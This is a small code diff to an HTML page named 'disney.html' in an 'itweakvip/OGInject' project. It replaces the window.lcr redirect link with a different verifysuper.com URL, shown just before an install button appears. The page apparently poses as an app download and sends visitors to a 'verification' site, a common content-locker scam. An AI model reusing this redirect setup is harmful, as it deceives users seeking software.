--- a/itweakvip/OGInject/disney.html
+++ b/itweakvip/OGInject/disney.html
@@ -125,7 +125,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=c7e7a19a87370abec821575a4153a51a";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
